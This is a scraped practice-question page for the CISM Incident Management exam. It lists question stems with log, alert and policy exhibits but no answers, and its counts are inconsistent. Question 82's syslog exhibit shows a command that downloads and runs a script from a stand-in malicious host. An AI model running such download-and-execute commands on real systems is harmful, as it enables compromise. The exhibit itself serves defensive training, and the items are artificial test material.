
Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


CISM Incident Management • Complete Question Bank

CISM Incident Management — All Questions With Answers

Complete CISM Incident Management question bank — all 0 questions with answers and detailed explanations.

176 Questions · Free · No signup
Question 1 (medium, multiple choice)

A multinational corporation has just detected a ransomware attack that encrypted critical files on a file server. The incident response team has been activated. Which of the following should be the FIRST action taken by the team?

Question 2 (hard, multiple choice)

During an incident investigation, the security team discovers that an attacker exfiltrated sensitive customer data via encrypted DNS tunneling over a period of three months. The data loss was only noticed after a routine audit. Which of the following weaknesses MOST likely allowed the attacker to remain undetected for so long?

Question 3 (easy, multiple choice)

An organization's incident response plan includes a step to 'contain the incident.' Which of the following actions is an example of containment?

Question 4 (medium, multiple choice)

During a simulated phishing exercise, several employees clicked a link and entered their credentials on a fake login page. The security team needs to determine the impact. Which of the following should be the NEXT step?

Question 5 (hard, multiple choice)

An organization is developing an incident response plan. The CISO wants to ensure that the plan aligns with industry best practices. Which framework should the CISO use as a primary reference?

Question 6 (easy, multiple choice)

After a security incident, the incident response team prepares a report detailing the root cause, impact, and lessons learned. Who is the PRIMARY audience for this report?

Question 7 (medium, multiple choice)

During an incident, the response team collects volatile data from a compromised server. Which of the following should be collected FIRST to minimize loss of evidence?

Question 8 (hard, multiple choice)

An organization uses a SIEM to correlate security events. The SIEM generates an alert for a possible brute-force attack against an admin account. The incident response team reviews the alert and finds that the account is a service account with a known password. What should the team do NEXT?

Question 9 (easy, multiple choice)

Which of the following is the PRIMARY purpose of an incident response plan?

Question 10 (medium, multiple choice)

A security analyst detects unusual outbound network traffic from a database server to an unknown IP address. The traffic uses encrypted connections on port 443. Which type of attack is MOST likely occurring?

Question 11 (hard, multiple choice)

During an incident investigation, the team discovers that an attacker used a valid user's credentials to access a sensitive database. The user's account had multi-factor authentication (MFA) enabled. How is this MOST likely possible?

Question 12 (medium, multi select)

Which TWO of the following are key indicators of a potential insider threat incident? (Select exactly 2)

Question 13 (hard, multi select)

Which THREE of the following are essential components of an incident response plan? (Select exactly 3)

Question 14 (easy, multi select)

Which TWO of the following are best practices for preserving digital evidence during an incident? (Select exactly 2)

Question 15 (medium, multi select)

Which THREE of the following are common challenges in incident response? (Select exactly 3)

Question 16 (medium, multiple choice)

Based on the SIEM alert exhibit, which immediate action should the incident responder take?

Exhibit

Refer to the exhibit.

```
[Alert] Correlation Rule: Multiple Failed Logins
Source IP: 10.0.0.55
Destination IP: 192.168.1.10
Event Count: 150 failed logins to admin account 'jsmith' within 5 minutes
Action: Triggered
```

Question 17 (hard, multiple choice)

Given the exhibit output from a web server, which connection is MOST suspicious and likely indicates a command-and-control (C2) channel?

Exhibit

Refer to the exhibit.

```
# netstat -an | grep :443
tcp4  0      0  *.443                 *.*                    LISTEN
tcp4  0      0  192.168.1.100.443     10.0.0.1.54321        ESTABLISHED
tcp4  0      0  192.168.1.100.443     10.0.0.2.54322        ESTABLISHED
tcp4  0      0  192.168.1.100.443     203.0.113.5.44333     ESTABLISHED
```

Question 18 (easy, multiple choice)

Based on the incident response policy exhibit, which phase should include notifying external stakeholders such as law enforcement?

Exhibit

Refer to the exhibit.

```
Policy: IncidentResponse
- Phase: Detection
  - Action: Alert security team
- Phase: Analysis
  - Action: Determine scope and impact
- Phase: Containment
  - Action: Isolate affected systems
- Phase: Eradication
  - Action: Remove malware
- Phase: Recovery
  - Action: Restore from backup
- Phase: Post-Incident
  - Action: Conduct lessons learned
```

Question 19 (hard, multiple choice)

You are the incident response manager for a financial services company. The company has a hybrid infrastructure with on-premises servers and cloud services. At 2:00 AM, the SIEM generates a critical alert: a database server in the DMZ is communicating with a known malicious IP address on port 443. The server contains customer PII. The on-call security analyst reports that the server is running and the connection is active. The incident response plan states that any confirmed compromise of PII must be reported to the regulator within 72 hours. You have the following options: A) Immediately isolate the server by disconnecting it from the network, then begin forensic analysis. B) Leave the server connected to gather more intelligence about the attacker's actions, but block only the malicious IP at the firewall. C) Shut down the server to preserve evidence and prevent data exfiltration. D) Copy the server's disk over the network for forensic analysis before taking any action. Which option is the BEST course of action?

Question 20 (medium, multiple choice)

You are a security analyst for a mid-sized e-commerce company. The company uses a cloud-based email service. Several employees report receiving phishing emails that appear to come from the CEO, asking them to purchase gift cards. The emails have a spoofed sender address but pass SPF and DKIM checks because the attacker compromised a legitimate email account. The CEO's account has been locked, but the attacker may have set up forwarding rules. You need to ensure the attacker cannot use the account further. You have the following options: A) Change the CEO's password and enable MFA, then remove any forwarding rules. B) Delete the CEO's email account and create a new one. C) Block all emails from the CEO's email address at the gateway. D) Restore the CEO's mailbox from a backup taken before the compromise. Which option is the BEST course of action?

Question 21 (easy, multiple choice)

An analyst receives an alert indicating a potential data exfiltration. The alert shows a host IP address 10.10.50.200 sending large amounts of data to an external IP address 203.0.113.5 over port 443. What should the analyst do FIRST?

Question 22 (medium, multiple choice)

A financial institution is designing an incident response plan. They want to ensure that during a ransomware incident, critical transaction systems can be restored within 4 hours. Which metric should be used to measure this requirement?

Question 23 (hard, multiple choice)

After a security incident, the incident response team identifies that the root cause was a phishing email that bypassed the email filter. The email contained a malicious macro that executed PowerShell commands. Which control would be MOST effective in preventing similar incidents in the future?

Question 24 (easy, multiple choice)

During an incident, the CIRT leader decides to contain a compromised server by disconnecting it from the network. However, this action may result in loss of volatile forensics data. What should the CIRT leader do?

Question 25 (medium, multiple choice)

An organization has a mature incident management process. After a major incident, they conduct a post-incident review. Which activity is MOST important during this review?

Question 26 (medium, multi select)

Which TWO actions are appropriate during the containment phase of an incident involving a malware outbreak on multiple workstations?

Question 27 (hard, multi select)

Which THREE elements should be included in an incident response plan to ensure effective communication during a security incident?

Question 28 (easy, multiple choice)

Refer to the exhibit. The security analyst observes these alerts. What is the MOST likely sequence of events?

Exhibit

Refer to the exhibit.

```
Incident Log:
[2025-03-20 08:15:23] ALERT: Multiple failed logins for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:16:01] ALERT: Successful login for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:20:45] ALERT: Unusual outbound connection from host 10.0.0.45 to 198.51.100.10:4444
[2025-03-20 08:22:30] ALERT: Large data transfer from host 10.0.0.45 to 198.51.100.10
```

Question 29 (medium, multiple choice)

Refer to the exhibit. During a ransomware incident, the response team discovers that the backup server is also encrypted. Which phase of the playbook is MOST impacted?

Exhibit

Refer to the exhibit.

```
Incident Response Playbook: Ransomware
Phase 1: Identification - Confirm ransomware via user reports and endpoint alerts.
Phase 2: Containment - Disconnect affected systems from the network. Do not power off.
Phase 3: Eradication - Remove malware using approved tools; reimage if necessary.
Phase 4: Recovery - Restore data from clean backups; verify integrity.
Phase 5: Post-Incident - Conduct lessons learned.
```

Question 30 (hard, multiple choice)

You are the incident response manager for a mid-sized e-commerce company. At 2:00 PM, the security operations center receives an alert from the intrusion detection system indicating a potential SQL injection attack against the customer database server. The server hosts a critical database containing customer PII and payment card data. The alert shows multiple suspicious queries from an internal IP address 192.168.10.50, which belongs to the development team's jump box. The development team uses this jump box to access production servers for maintenance. The jump box is managed by the IT operations team. The CEO is currently in a meeting with investors and cannot be disturbed. The CISO is on leave. The company has a written incident response plan that designates the IT director as the incident response coordinator in the absence of the CISO. The IT director has limited security knowledge. The database administrator (DBA) reports that the database is experiencing high CPU usage and that some customer records appear to have been modified. You need to take immediate action. What should you do FIRST?

Question 31 (medium, multiple choice)

During a ransomware incident, the incident response team identifies that the encryption process is still ongoing. The CISO decides to isolate affected systems to prevent further spread. Which of the following is the MOST appropriate next step?

Question 32 (easy, multiple choice)

An organization's security monitoring system detects multiple failed login attempts from an internal IP address to a critical database server. The attempts are occurring every few seconds. What is the FIRST step the incident response team should take?

Question 33 (hard, multiple choice)

After a major security incident, the incident response team completes the containment, eradication, and recovery phases. The CISO is now planning the post-incident activities. Which activity is MOST critical to ensure that lessons learned are effectively incorporated?

Question 34 (easy, multiple choice)

An organization has an incident response plan that designates a primary and alternate incident response team. During a simulated ransomware attack, the primary team is unavailable. What should the alternate team do FIRST?

Question 35 (hard, multiple choice)

A financial institution has a mature incident response program. During a security incident, the incident response team identifies that a business-critical application is affected. The team must decide whether to continue containing the incident or allow limited operations to continue. Which factor should be given the HIGHEST priority?

Question 36 (medium, multiple choice)

During an incident investigation, the forensic analyst discovers that a malware sample communicates with an external IP address. The organization's incident response plan requires a decision on whether to block the IP at the firewall. What should the incident response team do FIRST?

Question 37 (easy, multiple choice)

An incident response team discovers that an employee's workstation is infected with malware. The workstation contains sensitive customer data. Which of the following is the MOST appropriate containment strategy?

Question 38 (hard, multiple choice)

A large enterprise experiences a data breach involving personally identifiable information (PII) of customers. The incident response team has contained the breach and is now in the eradication phase. The CISO wants to ensure that the same vulnerability cannot be exploited again. Which action is MOST critical?

Question 39 (medium, multiple choice)

An organization's incident response team is notified of a potential denial-of-service (DoS) attack targeting their web application. The team suspects a distributed denial-of-service (DDoS) attack. What is the FIRST step the team should take?

Question 40 (medium, multi select)

Which TWO of the following are key components of an effective incident response plan?

Question 41 (hard, multi select)

Which THREE of the following are best practices for handling evidence during an incident investigation?

Question 42 (easy, multi select)

Which TWO of the following are indicators of a potential security incident?

Question 43 (medium, multiple choice)

Based on the exhibit, what is the MOST likely scenario?

Exhibit

Refer to the exhibit.

```
Event Log Entry:
Time: 2023-10-05 14:23:17
Event ID: 4625
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Failure Reason: Unknown user name or bad password.
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:24:05
Event ID: 4624
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:25:10
Event ID: 4648
Source: Security
User: jdoe
Logon Type: 2
Account Name: jdoe
Account Domain: CORP
Target Server: FILE-SRV-01
Additional Info: A logon was attempted using explicit credentials.
Workstation Name: WS-001
IP Address: 192.168.1.50
```

Question 44 (hard, multiple choice)

Based on the exhibit, what is the MOST likely issue?

Exhibit

Refer to the exhibit.

```
Firewall Log:
Date        Time      Source IP   Destination IP  Port  Protocol  Action
2023-10-05  10:00:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
2023-10-05  10:01:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
2023-10-05  10:02:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
... (repeated every minute)
2023-10-05  12:00:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW

IDS Alert:
Signature: ET TROJAN Win32/Malicious Beacon
Source IP: 10.0.0.15
Destination IP: 203.0.113.5
Time: 2023-10-05 10:00:00
Severity: High
```

Question 45 (easy, multiple choice)

Based on the exhibit, which role is responsible for notifying affected users about the phishing attack?

Exhibit

Refer to the exhibit.

```
Incident Response Plan - Roles and Responsibilities:
- Incident Response Manager: Coordinates response efforts.
- Technical Lead: Performs technical analysis and containment.
- Legal Counsel: Advises on legal and regulatory obligations.
- Communications Lead: Manages internal and external communications.
- Human Resources: Handles employee-related matters if involved.
- IT Support: Provides technical assistance as needed.

Scenario: A phishing attack has compromised several user credentials. The incident response team has been activated.
```

Question 46 (hard, multiple choice)

You are the incident response manager for a multinational corporation that processes sensitive financial data. The company has a mature security operations center (SOC) that monitors network traffic, endpoints, and cloud services. At 2:00 AM local time, the SOC alerts you to a critical incident: an internal server (IP 10.10.10.50) is communicating with an external IP address (198.51.100.23) known to be associated with a ransomware group. The server hosts a financial database that is replicated to a secondary site every 6 hours. The last successful replication was at 1:00 AM. The SOC has already isolated the server from the network by blocking its outbound traffic at the firewall. However, the server is still running. The initial investigation suggests that the communication started 30 minutes ago. The database contains customer PII and transactional data. Your incident response plan includes steps for containment, eradication, recovery, and post-incident review. The CEO is being notified and expects a recommendation on the best course of action. The company has a cyber insurance policy that requires timely notification and preservation of evidence. The legal department advises that any action that could destroy evidence must be carefully considered. Which of the following is the BEST course of action?

Question 47 (medium, multiple choice)

You are the information security manager for a mid-sized e-commerce company. The company operates a web application that handles credit card transactions and stores customer data in a backend database. The incident response team has just been alerted to a potential data breach: an intrusion detection system (IDS) flagged a SQL injection attack pattern on the web application's login page. The attack originated from an external IP address (5.5.5.5) and appears to have been successful, as the IDS also detected a large outbound data transfer from the database server to another external IP (6.6.6.6) shortly after. The database server is not segmented from the web server. The company has a legal obligation to report breaches involving cardholder data within 72 hours. The incident response plan is being activated. The team includes a forensic analyst, a network engineer, and a legal advisor. The web application is currently running and serving customers. The CEO wants to minimize business disruption. Which of the following actions should the incident response team take FIRST?

Question 48 (medium, multiple choice)

After a ransomware incident, the incident response team contains the spread and begins eradication. The team discovers that the ransomware encrypted files on a file server and also deleted shadow copies. Which of the following should the team do NEXT to support recovery?

Question 49 (hard, multiple choice)

An organization's security team detects an unusual spike in outbound traffic from a database server to an external IP address during a routine security scan. The database server contains sensitive customer data. Which of the following is the MOST appropriate initial response?

Question 50 (easy, multiple choice)

During an incident investigation, the incident response team needs to collect volatile data from a compromised server. Which of the following data should be collected FIRST?

Question 51 (hard, multi select)

A security analyst reviews the following alert from the SIEM: 'Multiple failed login attempts from IP 10.0.0.5 to the domain controller within 5 minutes.' Which TWO actions should the analyst take as part of initial incident response?

Question 52 (medium, multiple choice)

Based on the exhibit, which of the following is the MOST likely attack vector?

Exhibit

Refer to the exhibit.

```
[2025-03-10 14:32:15] CRITICAL: File integrity violation on /etc/passwd
[2025-03-10 14:32:15] File: /etc/passwd, Expected hash: a1b2c3d4e5f6, Actual hash: 9z8y7x6w5v4u
[2025-03-10 14:32:16] ALERT: Unauthorized SSH key added to /home/admin/.ssh/authorized_keys
[2025-03-10 14:32:18] ALERT: New user 'backup_agent' created with UID 0
```

Question 53 (hard, multiple choice)

You are the information security manager for a financial services company that processes credit card transactions. The company uses a mix of on-premises servers and cloud services. During a routine vulnerability scan, you discover that one of the web servers has been compromised with a web shell that allows remote command execution. The server is part of a cluster that handles customer-facing web traffic. The incident response team is activated. The team's immediate actions include isolating the server from the network and taking a forensic image. However, the server is critical for business operations, and management is pressuring you to restore service quickly. The server's logs show that the web shell was uploaded three days ago, and during that time, the server processed approximately 10,000 transactions. The team has not yet fully analyzed the forensic image. You need to decide on the next steps. What should you do FIRST?

Question 54 (medium, drag order)

Order the steps for a risk assessment process according to ISACA's risk management framework.


Question 55 (medium, drag order)

Order the steps for establishing a security incident response team (IRT).


Question 56 (medium, matching)

Match each incident management phase to its activity.

Activity descriptions (match each to its phase):
- Develop incident response plan and train team
- Identify and validate security incidents
- Isolate threat, remove malware, restore operations
- Conduct lessons learned and update procedures
- Notify stakeholders and regulatory bodies

Question 57 (medium, matching)

Match each data classification level to its handling requirement.

Handling requirements (match each to its classification level):
- No restrictions; can be freely distributed
- Access limited to employees; no external sharing
- Access on need-to-know basis; encryption required
- Highly sensitive; strict access control and logging
- Subject to legal/compliance requirements (e.g., PII)

Question 58 (easy, multiple choice)

A security analyst detects unusual outbound traffic from a critical server to an unknown external IP address during business hours. Which step should be taken FIRST in the incident response process?

Question 59 (easy, multiple choice)

During a post-incident review, the incident response team identifies that the root cause of a data breach was a misconfigured firewall rule that allowed unrestricted inbound access from the internet. Which corrective action BEST addresses this issue?

Question 60 (easy, multiple choice)

An organization's incident response plan (IRP) is being updated. Which stakeholder should be included in the IRP development to ensure legal and regulatory requirements are met?

Question 61 (medium, multiple choice)

After detecting a ransomware infection on a file server, the incident response team performs containment and eradication. Which step should be prioritized during the recovery phase to minimize business impact?

Question 62 (medium, multiple choice)

A company's incident response team uses a SIEM to detect security events. Which SIEM capability is MOST critical for early detection of a potential incident?

Question 63 (medium, multiple choice)

During an incident, the incident response team determines that a compromised account was used to exfiltrate data. The account has been disabled. What is the NEXT best action to prevent similar incidents?

Question 64 (hard, multiple choice)

An organization has a distributed incident response team across multiple time zones. During a critical incident, communication delays occur due to different work hours. Which strategy BEST improves coordination and response time?

Question 65 (hard, multiple choice)

A security operations center (SOC) analyst receives an alert from the SIEM indicating a potential command and control (C2) communication. The alert is based on a signature that matches known C2 traffic. What is the MOST appropriate next step?

Question 66 (hard, multiple choice)

During a security incident, the incident response team discovers that an attacker used a previously unknown vulnerability (zero-day) in a widely used software. Which action should the team take to address this vulnerability in the short term?

Question 67 (easy, multi select)

Which TWO of the following are primary goals of the containment phase in incident response? (Select TWO)

Question 68 (medium, multi select)

Which THREE of the following are key components of an incident response plan? (Select THREE)

Question 69 (hard, multi select)

Which TWO of the following are recommended practices when conducting a post-incident review? (Select TWO)

Question 70 (medium, multiple choice)

After a ransomware attack, a company discovers that backups are also encrypted. The incident response team has isolated the affected systems. What should be the next step?

Question 71 (easy, multiple choice)

An organization's intrusion detection system alerts on a potential C2 communication from an internal host. Which phase of the incident response lifecycle should be initiated first?

Question 72 (hard, multiple choice)

A multinational corporation experiences a security breach involving customer PII. The incident response team needs to determine notification requirements. Which factor is MOST important in deciding which regulatory bodies to inform?

Question 73 (medium, multiple choice)

During incident response, a forensic investigator needs to collect evidence from a compromised server. Which action BEST preserves evidence integrity?

Question 74 (easy, multiple choice)

An incident response plan (IRP) is being tested. Which metric is MOST indicative of the team's effectiveness during an exercise?

Question 75 (hard, multiple choice)

After a phishing attack, an organization's incident response team identifies that the attacker gained access to an email account and sent internal spear-phishing emails. What is the BEST immediate containment action?

Question 76 (medium, multiple choice)

An organization's incident response team is conducting a lessons learned meeting after a major incident. Which outcome is MOST critical to document?

Question 77 (easy, multiple choice)

A security analyst notices unusual outbound traffic from a server that is not scheduled for any data transfers. Which step should the analyst take FIRST?

Question 78 (hard, multiple choice)

During a security incident, the incident response team discovers that an attacker has exfiltrated data via an encrypted tunnel over HTTPS. Which log source is MOST likely to provide evidence of the exfiltration?

Question 79 (medium, multi select)

Which TWO actions are key components of the 'Containment' phase in incident response?

Question 80 (hard, multi select)

Which TWO criteria should an organization use to prioritize incidents during triage?

Question 81 (easy, multi select)

Which THREE steps are essential in the post-incident review process?

Question 82 (hard, multiple choice)

Based on the exhibit, what is the MOST likely attack vector that led to the compromise?

Exhibit

Refer to the exhibit.

Exhibit: Syslog output from a compromised server:

Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh

Question 83 (medium, multiple choice)

Based on the exhibit, an incident involves unauthorized access to a file server containing corporate training videos. No sensitive data is stored there. Which priority should the incident be assigned?

Exhibit

Refer to the exhibit.

Exhibit: Incident response plan excerpt:

Triage Priority Matrix:
- Critical (C): PII or financial data affected, regulatory implications, widespread impact
- High (H): Sensitive business data, limited user impact, potential for escalation
- Medium (M): Internal operational data, no regulatory impact, isolated systems
- Low (L): Low-value data, no sensitive information, easily restored

Question 84 (easy, multiple choice)

Based on the exhibit, what is the PRIMARY risk of the automated response policy as configured?

Exhibit

Refer to the exhibit.

Exhibit: JSON policy snippet for an incident response automation:

{
  "policy_name": "Auto-Contain Malicious IP",
  "trigger": "SIEM_alert.severity >= 5",
  "actions": [
    {"action": "block_ip", "target": "alert.source_ip"},
    {"action": "isolate_host", "target": "alert.target_host"},
    {"action": "create_ticket", "assignee": "IR_team"}
  ],
  "notify": ["SOC_manager"],
  "auto_approve": true
}

Question 85 (easy, multiple choice)

A security analyst detects a potential data exfiltration from a critical server. According to incident response best practices, what is the first action the analyst should take?

Question 86 (medium, multiple choice)

After containing an incident, the incident response team is ready to proceed. According to NIST SP 800-61, what is the next phase?

Question 87 (hard, multiple choice)

An organization is compromised by an APT that has established multiple backdoors across the network. What is the most effective eradication strategy?

Question 88 (easy, multiple choice)

A small business without a dedicated incident response team experiences a suspected breach. Who should be primarily responsible for leading the incident response efforts?

Question 89 (medium, multiple choice)

During an incident investigation, the response team discovers that the attacker exploited a known vulnerability for which a patch was available but not applied. What should be the team's primary focus during the recovery phase?

Question 90 (hard, multiple choice)

A security operations center receives an alert from an IDS indicating possible command and control traffic. The analyst is unsure if it's a true positive. Which combination of actions should be taken first?

Question 91 (easy, multiple choice)

An organization has just experienced a ransomware attack that encrypted files on several file servers. The incident response team has contained the incident. What is the next critical step?

Question 92 (medium, multiple choice)

During an incident, the incident response team discovers that the attacker used stolen credentials to access the network. What should the team do during the eradication phase?

Question 93 (hard, multiple choice)

An organization is under a DDoS attack that is saturating their internet link. The incident response team needs to mitigate the attack. Which action should be taken first?

Question 94 (easy, multi select)

During the detection and analysis phase of incident response, which two activities are essential? (Choose two.)

Question 95 (medium, multi select)

An incident response plan should include which three key components to ensure effective response? (Choose three.)

Question 96 (hard, multi select)

An organization suspects a data breach. Which two actions should the incident response team take before notifying affected customers? (Choose two.)

Question 97 (medium, multiple choice)

Given the exhibit, what is the most likely classification of this incident?

Exhibit

Refer to the exhibit.
Alert: 'Elevated number of failed logins from IP 10.0.0.5 to multiple user accounts on Domain Controller.'
Time: 2025-03-01 14:23:45
Additional details: 50 failed attempts in 30 seconds.

Question 98 (hard, multiple choice)

Based on the configuration snippet, what is the expected behavior when an incident is triggered?

Exhibit

Refer to the exhibit.
```
[incident_response]
playbook = "playbook_standard"
priority_override = False
notification_email = "ir-team@company.com"
auto_contain = True
```

Question 99 (easy, multiple choice)

Based on the exhibit, what is the first action the incident response team should take?

Exhibit

Refer to the exhibit.
[2025-04-01 08:12:33] ERROR: Firewall rule 'Allow-Internal-Web' permit tcp 10.0.0.0/8 192.168.1.0/24 port 80
[2025-04-01 08:12:34] ALERT: IDS signature 'WEB-MISC cross-site scripting attempt' from 10.5.5.5 to 192.168.1.10:80

Question 100 (easy, multiple choice)

A security analyst receives an alert indicating a potential data exfiltration from a server. Which of the following should be the FIRST step in the incident response process?

Question 101 (easy, multiple choice)

During an incident, the incident response team needs to preserve evidence for legal proceedings. Which of the following is the MOST important action to take?

Question 102 (medium, multiple choice)

An organization has multiple security tools that generate alerts. The incident response team is overwhelmed by the volume of alerts. Which of the following is the BEST approach to manage this issue?

Question 103 (medium, multiple choice)

During an incident investigation, the team discovers that a compromised account was used to exfiltrate data. Which of the following should the team do NEXT?

Question 104 (hard, multiple choice)

An organization has implemented a host-based intrusion prevention system (HIPS) on all endpoints. An internal audit reveals that many incidents go undetected because users often disable HIPS when it interferes with applications. Which of the following is the MOST effective control to address this issue?

Question 105 (hard, multiple choice)

After a ransomware attack, the incident response team successfully restores systems from backups. However, the ransomware encrypts files that were modified after the last backup was taken. Which of the following is the BEST way to minimize future data loss?

Question 106 (easy, multiple choice)

An organization's incident response plan has not been updated in two years. Which of the following is the MOST likely consequence?

Question 107 (medium, multiple choice)

During an incident, the team identifies that a contractor's credentials were used to access sensitive data. Which of the following should be the IMMEDIATE action?

Question 108 (hard, multiple choice)

An organization's incident response team uses a SIEM system to correlate logs. A malicious insider is able to cover their tracks by deleting logs from the SIEM. Which of the following is the BEST preventive control?

Question 109 (medium, multi select)

An organization experiences a data breach involving personal information. Which TWO actions should be taken as part of incident response? (Choose two.)

Question 110 (hard, multi select)

An incident response team is analyzing a phishing email that successfully compromised a user's credentials. Which TWO indicators of compromise (IOCs) should the team prioritize collecting? (Choose two.)

Question 111 (easy, multi select)

Which THREE of the following are key phases of the incident management lifecycle according to NIST or ISO? (Choose three.)

Question 112 (medium, multiple choice)

According to the exhibit, which role is responsible for conducting forensic analysis?

Exhibit

Refer to the exhibit.
[Incident Response Plan Roles]
Role: Incident Manager - Coordinates response
Role: Technical Lead - Performs analysis
Role: Communication Lead - Handles communications
Role: Legal Counsel - Provides legal guidance

Question 113 (hard, multiple choice)

The SIEM alerts on this traffic. What should the incident analyst do FIRST?

Exhibit

Refer to the exhibit.
[Threat Intelligence Feed]
Indicator: 203.0.113.5
Type: IP
Confidence: High
Tags: C2, Malware
[Proxy Log]
src=10.0.1.50 dst=203.0.113.5 port=443 action=ALLOWED

Question 114 (easy, multiple choice)

Based on the exhibit, what is the MOST significant gap in incident management?

Exhibit

Refer to the exhibit.
[Incident Log Summary]
Date Range: 2024-01-01 to 2024-06-30
Total Incidents Reported: 120
Incidents with reported response time > 24 hours: 12
Incidents with no documentation: 45

Question 115 (easy, multiple choice)

A security analyst detects an unusual spike in outbound traffic from a database server. Which of the following is the FIRST step in the incident response process?

Question 116 (medium, multiple choice)

During incident response, a team discovers that a phishing email successfully compromised a user's credentials. Which containment strategy would BEST limit further damage?

Question 117 (hard, multiple choice)

An organization's IDS logs show multiple outbound connections to an external IP address from a server that normally communicates only internally. The logs indicate the process is running under the SYSTEM account. Which of the following BEST describes the likely root cause?

Question 118 (easy, multiple choice)

During an incident, the incident response team is communicating with affected stakeholders. According to best practices, which of the following should be communicated FIRST?

Question 119 (medium, multiple choice)

A security operations center analyst receives an alert from the SIEM indicating a possible data exfiltration. The analyst is unsure if it is a true positive. What is the MOST appropriate action?

Question 120 (hard, multiple choice)

An incident has been declared involving a ransomware attack that encrypted critical servers. The organization has backups, but the backups were also encrypted. Which of the following is the BEST course of action?

Question 121 (easy, multiple choice)

A user reports that their computer is behaving oddly, and an IT technician finds a suspicious file in the startup folder. The technician is not sure if this is an incident. What should the technician do FIRST?

Question 122 (medium, multiple choice)

After an incident is contained and eradicated, the incident response team conducts a post-incident review. Which of the following is the PRIMARY objective of this review?

Question 123 (hard, multiple choice)

During a cyber incident, the organization's legal counsel advises that certain information about the breach should not be shared with external partners due to ongoing law enforcement investigation. The incident response team must balance transparency with confidentiality. Which of the following is the BEST approach?

Question 124 (easy, multi select)

Which TWO are key indicators of a data breach? (Choose two.)

Question 125 (medium, multi select)

Which THREE are essential steps in incident containment? (Choose three.)

Question 126 (hard, multi select)

Which THREE are valid sources for threat intelligence that can be used during incident response? (Choose three.)

Question 127 (medium, multiple choice)

Refer to the exhibit. Given the exhibit, which type of incident is MOST likely occurring?

Exhibit

[2025-04-09 10:23:45] ALERT: User 'jdoe' logged in from IP 198.51.100.100 (unusual location) at 10:23:45.
[2025-04-09 10:24:10] EVENT: User 'jdoe' attempted to access /admin/config with lack of privilege.
[2025-04-09 10:25:00] EVENT: User 'jdoe' accessed /finance/customers.xlsx and downloaded 500MB.
[2025-04-09 10:25:30] ALERT: Large data transfer from internal IP to external IP 203.0.113.5.

Question 128 (hard, multiple choice)

Refer to the exhibit. Based on the exhibit, what is the security implication of this S3 bucket policy?

Exhibit

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::company-reports/*",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "10.0.0.0/8"
        }
      }
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::company-reports/*"
    }
  ]
}

Question 129 (easy, multiple choice)

Refer to the exhibit. The exhibit shows network traffic from a server to a database. What does this pattern MOST likely indicate?

Exhibit

2025-04-09 10:30:00 192.168.1.10 -> 10.10.10.10:3306 (MySQL) - 10 connections
2025-04-09 10:30:05 192.168.1.10 -> 10.10.10.10:3306 - 20 connections
2025-04-09 10:30:10 192.168.1.10 -> 10.10.10.10:3306 - 50 connections
2025-04-09 10:30:15 192.168.1.10 -> 10.10.10.10:3306 - 100 connections

Question 130 (easy, multiple choice)

After a security incident, which step should be taken first?

Question 131 (easy, multiple choice)

A company's IDS alerts on a potential breach. The incident response team is called. What should they do immediately?

Question 132 (easy, multiple choice)

During incident investigation, which evidence preservation method is most important?

Question 133 (medium, multiple choice)

A company experiences ransomware that encrypts critical servers. Backups are available but were taken 2 weeks ago. What is the best course?

Question 134 (medium, multiple choice)

An organization's incident response plan includes a call tree. During an incident, the primary contact is unreachable. What should happen?

Question 135 (medium, multiple choice)

After containing a security incident, the team conducts a root cause analysis. They find the breach originated from a compromised third-party vendor account. What is the most effective long-term mitigation?

Question 136 (hard, multiple choice)

An incident response team is dealing with a persistent threat that uses fileless malware. Which containment strategy is most effective?

Question 137 (hard, multiple choice)

During a data breach investigation, the team discovers that an attacker exfiltrated data via encrypted HTTPS to a server abroad. Which forensic step is most critical?

Question 138 (hard, multiple choice)

An organization's IR plan is tested annually. After a test, many gaps are identified. What is the best next step?

Question 139 (medium, multi select)

Which TWO actions are essential during the detection and analysis phase of incident response?

Question 140 (medium, multi select)

Which TWO are common challenges in incident management?

Question 141 (hard, multi select)

Which THREE are key components of an effective post-incident review?

Question 142 (medium, multiple choice)

Refer to the exhibit. An analyst sees this alert on the network. What is the most appropriate immediate action?

Exhibit

[IDS Alert] Signature: ET TROJAN Known Botnet C2 1
Source: 10.0.1.50:443 -> Destination: 203.0.113.5:8080
Payload: [encrypted]

Question 143 (hard, multiple choice)

Refer to the exhibit. What is most suspicious about this event?

Exhibit

[Windows Event Log] Event ID 4688: A new process has been created.
Creator Subject: Security ID: S-1-5-21-...  Account Name: jdoe
Process Information: New Process ID: 0x1a2b  New Process Name: C:\Users\jdoe\AppData\Local\Temp\svchost.exe

Question 144 (hard, multiple choice)

